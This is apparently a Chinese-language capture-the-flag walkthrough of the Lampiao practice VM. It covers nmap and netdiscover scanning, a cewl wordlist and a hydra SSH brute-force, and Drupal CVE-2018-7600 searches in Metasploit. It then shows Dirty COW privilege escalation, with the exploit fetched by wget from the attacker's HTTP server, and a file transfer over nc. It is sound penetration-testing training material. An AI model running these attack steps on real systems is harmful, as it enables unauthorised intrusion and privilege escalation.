Lampiao靶场
Lampiao渗透流程
-
主机发现
- 使用netdiscover进行被动扫描
netdiscover -i eth0 -r 10.10.10.0/24
- 使用nmap进行主动扫描
nmap -sS 10.10.10.0/24
-
对目标主机对主机进行端口扫描
#全端口扫描
nmap -p- 10.10.10.136
- 查看目标主机的服务版本和操作系统信息
nmap -sS -sV -T5 -A 10.10.10.136
- 在浏览器中查看80端口,为静态页面并查看源代码,没有重要信息,接着查看http://10.10.10.136:1898/。
-
拿到网站后,先大体浏览下,然后进行目录扫描。
-
发现页面底部有相关的信息。
然后进行目录扫描:
-
先进入robots.txt文件查看目录结构,看看有没有什么敏感文件。主要查看Disallow部分。
通过查看/CHANGLOG.txt可以看到Drupal 7.54,2017-02-01 -
修改?q=node/1查看一下有没有变换。
当?q=node/2时,发现了有两个文件地址,其中一个是语音文件,一个是二维码。通过语音文件发现用户名为:tiago。
扫描二维码,发现没有有用的信息。整理搜集到的信息:1. 用户名:tiago;2. Drupal 7.54
-
-
使用kali的cewl,cewl通过爬行网站获取一些关键信息然后创建一个密码字典。
cewl 10.10.10.136:1898 -w password.txt
然后对网页登录页面(http://10.10.10.136:1898/index.php)进行弱密码爆破,然后就。。。。
发现IP被锁定了,从而说明不存在弱密码爆破漏洞。那就使用hydra对SSh进行弱密码爆破试试。
hydra -l tiago -P password.txt 10.10.10.136 ssh
远程ssh登录目标主机,并查看用户权限,发现用户权限为普通用户
通过之前的信息收集,发现Drupal 7.54在网上存在相应的漏洞,使用msf进行相关的测试。通过"search cve-2018-7600、search cve-2018-7602或者drupal"查看相关的利用载荷。
通过调用pty(pseudo-terminal)模块来创建一个伪终端,并在其中启动一个交互式shell。
python -c 'import pty; pty.spawn("/bin/bash")'
可以看到权限仍然很低,查看特殊权限位文件,看看能不能使用suid提权。
find / -perm -u=s -type f 2>/dev/null
查看Linux内核版本
uname -a
脏牛提权
使用searchsploit工具找到提权脚本,并复制在桌面上。
searchsploit dirty
上传到目标主机上:
- kali上开启本地http服务
python -m http.server 8888
- 目标主机下载该利用文件
wget http://10.10.10.128:8888/Desktop/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o kks 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o kks gcc生成的目标文件,名字为kks
执行gcc编译可执行文件,可直接提权。
8. 上传漏洞检测脚本
1. 下载漏洞检测脚本
linux-exploit-suggester-2是一款基于Shell脚本的Linux漏洞利用检测工具,旨在快速检测和识别Linux系统中存在的漏洞。
git clone https://github.com/jondonas/linux-exploit-suggester-2.git
2. 上传漏洞检测脚本到目标系统上
在目标系统上:
nc -l 4444 > linux-exploit-suggester-2.pl
在kali上:
nc 10.10.10.136 4444 < /root/Desktop/linux-exploit-suggester-2.pl
在目标系统上为检测脚本添加执行权限并执行
```
chmod +x linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
```
